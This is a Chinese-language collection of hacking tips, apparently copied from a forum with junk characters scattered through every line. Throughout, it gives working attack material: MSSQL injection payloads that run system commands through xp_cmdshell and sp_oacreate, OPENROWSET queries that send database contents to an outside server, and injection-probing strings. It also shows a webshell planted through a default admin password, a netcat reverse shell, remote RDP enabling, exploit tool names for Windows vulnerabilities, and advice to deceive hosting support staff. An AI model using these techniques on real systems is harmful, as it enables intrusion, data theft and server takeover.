SA点数据库分离技术相关4 v b; D, B* j5 E
' p+ h- X9 q# A" Y. s0 N
% c( L3 Y" w6 Y) J, c6 S; y6 q% H. ~SA点数据库分离搞法+语句:
* z( |0 ^& s$ [- E, P" ~2 F0 {
! I+ J+ }- N* T- b2 V( N& t# \! l注射点不显错,执行下面三条语句页面都返回正常。
( s) z% v& o3 Y1 I2 y3 Y0 ~and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
7 V0 K) J" L* ]0 R1 yand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')4 E/ z" P: |9 S. Z7 q9 G5 W
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')5 S, \2 D9 x( j" f6 y
可以列目录,判断系统为2000,web与数据库分离2 N& r/ I2 Y; I+ E& f1 a
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
+ n9 y4 X4 ?& s6 }0 K. U" y: i在注射点上执行
4 D3 [4 Z o6 ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--# Q: e& @/ R3 s3 y# p. `; x
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP' j: v+ j: B) c, x- D
还有我用NC监听得其他端口都没有得到IP。% J8 [ X# Q6 E; |5 K
& s5 {8 V, j" R' H+ ^通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
0 {+ i! W1 f& R2 n. N- j& n'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
6 K! ?/ I. Q: H' L8 u# W r5 b4 o& m/ t3 y6 i0 |# W$ q
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
) g* ^3 V- ?2 o3 q0 `5 d
+ F* {& k7 Y" w. E2 A$ f现在就猜想是不是数据库是内网而且不能连外网。- u: m1 P+ q# h( }/ z
. O2 W! B2 L' h
' z# V% E& w) k! E; F1 {- ~% ^access导出txt文本代码
4 k( V) p) ^2 E' ]3 PSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
$ _! c8 X+ s6 J/ P+ T3 q# u: u1 F' C9 S! P7 y4 A
* n, D' U! W9 C/ {* x% D" r- ^ s
3 s0 t$ i/ t# y s0 r2 @3 f自动跳转到指定网站代码头7 @1 o& F: s; P3 E1 E; h7 B
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>1 N3 C$ Y* ~4 [) v' L
1 t& e% g- w7 y$ Y& n6 w6 W6 \5 v
" S2 T: @9 C: V入侵java or jsp站点时默认配置文件路径:1 z/ G0 {% @$ r( z" p( S; Z
\web-inf\web.xml9 Q' p6 S/ C5 ~) L, c. ~
tomcat下的配置文件位置:6 C( e; u! p; u2 I- q+ U, S
\conf\server.xml (前面加上tomcat路径)1 Y0 e3 c$ ^; c8 m; C" t% m
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
3 {+ {6 l7 ^: X3 A% }0 {7 p2 w/ R# f1 L2 c7 t3 D
& U: l; x) Y& x4 V# G2 S+ n; S: f4 R
6 ]4 ?. K$ m% \检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:2 T1 F0 q* Y. Y, C
-1%23) w2 _( C) c2 G3 B8 _
>
$ F% z O3 e5 B6 ?; }2 I; d: \<' h- C F0 u; n% K
1'+or+'1'='1: y* _4 N- R' \* i
id=8%bf% @2 G) c1 o: J' }# m
+ C" U' G d( s0 S& o
全新注入点检测试法:
) ^. x0 _! \! G- h在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
& j" G6 c+ Y4 W# d/ S1 a" g: C- ]* z7 j+ e
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
# D4 M* t! R6 G$ ~5 A$ w% y7 Y# G4 G& q! e: r" R
搜索型注入判断方法:0 D2 {7 X; B4 g1 o: D
北京%' and '1'='1' and '%'='
" @$ ~! W9 P; J X北京%' and '1'='2' and '%'='( A- t' \7 f$ S/ ?5 m8 r/ V j
( _, t, O- Z" u1 m' R& f; R' H! H8 x7 w! }7 C2 ^+ p
COOKIES注入:* G1 t( Z: o$ L( x, b$ x/ x
, C# k- J4 O" t7 }; I i; I! Hjavascript:alert(document.cookie="id="+escape("51 and 1=1"));9 P' o/ K4 c* \7 R& P! s5 G
- V6 r; M- o7 M6 C( d
2000专业版查看本地登录用户命令:
8 j* `0 X9 k# r4 J0 q6 ?$ lnet config workstation
) T* \2 L! l. ^/ g _" ?# ]
0 d8 L% ?4 e" ]8 @$ I4 G1 g! \! n
: k4 @; R: h& d2 I4 C, A$ c2003下查看ipsec配置和默认防火墙配置命令:1 M4 S$ |& Q; h, \* t) W
netsh firewall show config. E" [1 E2 {5 w3 g, u# a9 A
netsh ipsec static show all
( a4 a. i2 _- w. i& k3 g7 `8 G/ i# O; ], P& J
不指派指定策略命令:
! s1 W" h. z8 U" X- N, {8 onetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
: P8 N8 W) V; \" v$ H4 qnetsh ipsec static show policy all 显示策略名( G. u7 q4 q( C8 k
, V D7 t" C4 L! ~3 Q2 G/ J! V: e6 m
/ G: N# K1 H r# @& v猜管理员后台小技巧:
' n. ]& X- F+ j/ L, g9 gadmin/left.asp
, y5 `. j3 T4 j4 Fadmin/main.asp
9 z- n, ~8 S z/ j7 |$ Dadmin/top.asp
k- }8 ~ k; \" O; v4 D, F' uadmin/admin.asp
* ~6 k, E @5 l3 O( h# s3 U会现出菜单导航,然后迅雷下载全部链接& R/ y3 z1 S0 I' K
5 B, M# ]; t' u6 }5 B+ r+ f" U2 j, b* `: {2 Z( H
社会工程学:7 z. T2 g' p. Z7 e
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
% \, n6 A4 c; E& X& i% \然后去骗客服6 Q) U, P0 K, s5 O" Y
) T' `' a( K; \2 B3 R! V- D/ v& v) c; f/ v; n# C
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
- |0 s) M5 I! I1 t/ M7 k查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 5 g) A# \; Y8 Y
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。( }) O% Q/ ?, E0 R" I$ \
4 E$ R. N, t) b% M: K7 h# |
8 {* K8 o/ u7 Z" `7 j: w0 l8 o
6 O6 w& V4 l0 \# X: O0 s9 W7 V! v6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)8 Y$ j) ~# m6 y1 U+ b3 U/ {3 u4 T" k$ q
3 X" E4 D: n; }
( {$ G1 l# h2 L5 M5 z# M: Z- @( o0 P1 I8 F W
CMD加密注册表位置# i! L o- j9 H# x, z6 c; _7 h
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
8 a- k8 e6 ]0 O8 e: n* N; D) ]AutoRun
, d+ V+ k+ q. j% A
^% a3 J+ D1 C; X" \) v(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor4 T* K* t! C" z4 ]- T, J8 j
AutoRun( o p7 ^* b: y1 ^6 S) [1 o6 y) U
4 M; U8 I F6 k0 ?8 \
( d, R5 U+ `8 k+ t Q! i在找注入时搜索Hidden,把他改成test, c j+ Q0 g. n4 f3 K
2 k- ^5 m& E$ |/ z0 i" w4 [
; p+ H: W; e3 R+ b8 _( U5 I5 r% L/ M( `
mstsc /v:IP /console 7 H6 ? f4 N3 r
2 N# x% ]5 T6 S6 L, G4 e7 s ?' A2 f/ x7 l' X& ^ j
一句话开3389:7 f; h$ X! N9 s$ {! X6 a+ _: \$ L
/ Z, W. F) ^8 L8 |6 ?最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
) X0 A. A5 S# k开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.- g* N0 {( p' ^
' ]" R$ Q% n# U3 a( I
4 O% P2 f% g( i+ s( |* s
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:3 t9 N1 I F, m
Insert into admin(user,pwd) values('test','test')
s' J5 Y9 Q& M0 g5 D9 ^. I/ _; P% m1 d
. j! Q. M% L* ?4 _# c% r
NC反弹
. Y6 x d$ X! I! K7 V t$ H& h/ N1 g先在本机执行: nc -vv -lp 监听的端口 (自己执行) # `8 V G* G% }6 a, m: \
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)$ v4 w% T- [" @& Z
3 T/ h) X4 ]! I3 h# [
9 J7 o) k3 K1 j9 _1 x4 _( @在脚本入侵过程中要经常常试用%00来确认下参数是否有问题$ [0 W8 ]3 V2 S! ~5 I* Y8 x
+ v: l N% K, ?0 w2 L8 A2 u
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录7 D. Y8 i- Z( B# o
例如: a8 t5 H9 F; X5 d4 A7 i
subst k: d:\www\ 用d盘www目录替代k盘
1 A; i ~8 F5 P# l4 Tsubst k: /d 解除K盘代替 |